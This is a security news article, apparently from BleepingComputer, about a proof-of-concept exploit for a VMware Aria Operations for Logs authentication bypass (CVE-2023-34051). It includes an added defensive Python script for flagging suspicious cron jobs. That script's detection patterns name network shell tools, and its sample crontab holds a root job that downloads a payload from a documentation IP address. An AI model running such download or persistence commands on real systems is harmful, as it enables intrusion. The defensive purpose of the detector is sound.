VMware Security Alert: Proof-of-Concept Exploit Code Threatens Authentication Bypass Flaw
VMware has issued a warning to its customers regarding a significant threat. Proof-of-concept (PoC) exploit code is now circulating for a critical authentication bypass flaw found in vRealize Log Insight, which has since been rebranded as VMware Aria Operations for Logs.
VMware took immediate action to update its advisory, confirming the availability of the exploit code for CVE-2023-34051. This particular vulnerability presents a serious concern, as it could potentially allow unauthenticated attackers to execute code remotely with root-level permissions, under specific conditions.
The successful exploitation of this flaw relies on a series of factors. Specifically, the attacker must compromise a host within the targeted environment. This compromised host must also have the necessary permissions to add an extra interface or a static IP address, further emphasizing the importance of robust security practices and access controls.
The discovery of this flaw can be attributed to the diligent work of security researchers from Horizon3, who have conducted a detailed root cause analysis. Their findings, which were published on a recent Friday, provide additional insights into how CVE-2023-34051 can be leveraged to gain remote code execution privileges with root access. Furthermore, Horizon3’s security team has also released a PoC exploit, along with a list of indicators of compromise (IOCs) that network defenders can employ to identify any attempts at exploitation within their own environments.
The PoC exploit, as described by the Horizon3 Attack Team, combines IP address spoofing with several Thrift RPC endpoints to achieve an arbitrary file write. In its default configuration, the PoC uses that file write to create a cron job that spawns a reverse shell; Horizon3 notes that the payload file is meant to be modified to suit a particular environment.
It’s essential to highlight that for this attack to be successful, the attacker must possess the same IP address as a master or worker node within the target network, adding an additional layer of complexity to the exploitation process.
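Because the PoC's default payload persists through a cron job, auditing cron entries on the appliance is one practical place for defenders to look. The following is an added example, not code from the article or from Horizon3's release: the triage rules and the sample crontab are constructed for illustration and are not Horizon3's published IOC list.

```python
import re

# Triage heuristics for cron persistence on a Linux appliance. These are the
# example author's own rules, not Horizon3's published IOC list.
SUSPICIOUS_PATHS = re.compile(r"(^|[\s'\"=])(/tmp|/var/tmp|/dev/shm)/")
NETWORK_TOOLS = re.compile(r"(^|[\s/])(nc|ncat|netcat|socat|curl|wget)\b|/dev/tcp/")
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*$")

# Constructed sample in /etc/cron.d format (schedule, user, command). The last
# two entries are the shape of persistence an arbitrary file write as root can
# leave behind; 203.0.113.5 is a documentation address, not a real indicator.
SAMPLE_CRON_D = """\
# /etc/cron.d/appliance-housekeeping (constructed sample)
SHELL=/bin/sh
17 * * * * root run-parts /etc/cron.hourly
0 3 * * * root /usr/local/sbin/rotate-logs.sh
* * * * * root /bin/sh /tmp/.cache/sync.sh
@reboot root /usr/bin/curl -s http://203.0.113.5/a -o /var/tmp/a
"""

def parse_cron_d(text):
    """Return (schedule, user, command) tuples; skips comments and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or "=" in parts[0]:
            continue
        n_sched = 1 if parts[0].startswith("@") else 5  # @reboot vs 5-field schedule
        fields = line.split(None, n_sched + 1)
        if len(fields) < n_sched + 2:
            continue  # malformed: no user or command
        entries.append((" ".join(fields[:n_sched]), fields[n_sched], fields[n_sched + 1].rstrip()))
    return entries

def flag_entries(text):
    """Return flagged entries with the reasons each tripped; empty list if clean."""
    findings = []
    for schedule, user, command in parse_cron_d(text):
        reasons = []
        if SUSPICIOUS_PATHS.search(command):
            reasons.append("runs code from a world-writable directory")
        if NETWORK_TOOLS.search(command):
            reasons.append("invokes a network-capable tool or /dev/tcp")
        if user == "root" and EVERY_MINUTE.match(schedule):
            reasons.append("root job scheduled every minute")
        if reasons:
            findings.append({"schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings
```

Run `flag_entries` over the contents of /etc/cron.d/*, /etc/crontab and the per-user spool files; treat hits as leads for manual review, not as confirmation.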
While we haven’t reversed the Cisco 0-day just yet, we do have the deep-dive and IOCs for CVE-2023-34051 affecting #VMware Aria Operations for Logs.
This vulnerability is a patch bypass discovered by @JamesHorseman2 that allows for RCE as root under certain conditions.…
— Horizon3 Attack Team (@Horizon3Attack) October 20, 2023
RCE exploit chain
This vulnerability is not an isolated concern. Instead, it is part of a chain of exploits that have previously been addressed by VMware. These earlier issues were resolved in a security update issued in January. The vulnerabilities in question included a directory traversal bug (CVE-2022-31706), a broken access control flaw (CVE-2022-31704), and an information disclosure bug (CVE-2022-31711). When chained together, these vulnerabilities could allow attackers to inject maliciously crafted files into the operating system of VMware appliances running unpatched Aria Operations for Logs software.
While the exploitation of this vulnerability may seem straightforward, it’s important to note that it does require a certain level of infrastructure setup for serving malicious payloads. Additionally, since this product is typically not exposed to the public internet, attackers are likely to have established a foothold elsewhere within the network before carrying out such an attack.
Despite this, it’s a grim reality that threat actors often exploit vulnerabilities within previously compromised networks for lateral movement. This underlines the critical importance of promptly addressing these vulnerabilities to prevent further security breaches.
It’s worth noting that this isn’t the first time VMware has found itself dealing with such critical vulnerabilities. In June, the company had to alert customers about another severe remote code execution vulnerability in VMware Aria Operations for Networks, which was being actively exploited by threat actors. This earlier vulnerability was tracked as CVE-2023-20887 and had created a significant security risk for affected organizations.
VMware remains committed to addressing these security challenges and enhancing the resilience of its products to emerging threats. Customers are strongly encouraged to apply available security updates and follow best practices for securing their VMware environments. The latest authentication bypass flaw and associated exploit code serve as a stark reminder of the ever-evolving landscape of cybersecurity threats, calling for vigilance and swift action to protect critical infrastructure and sensitive data.
Source: bleepingcomputer.com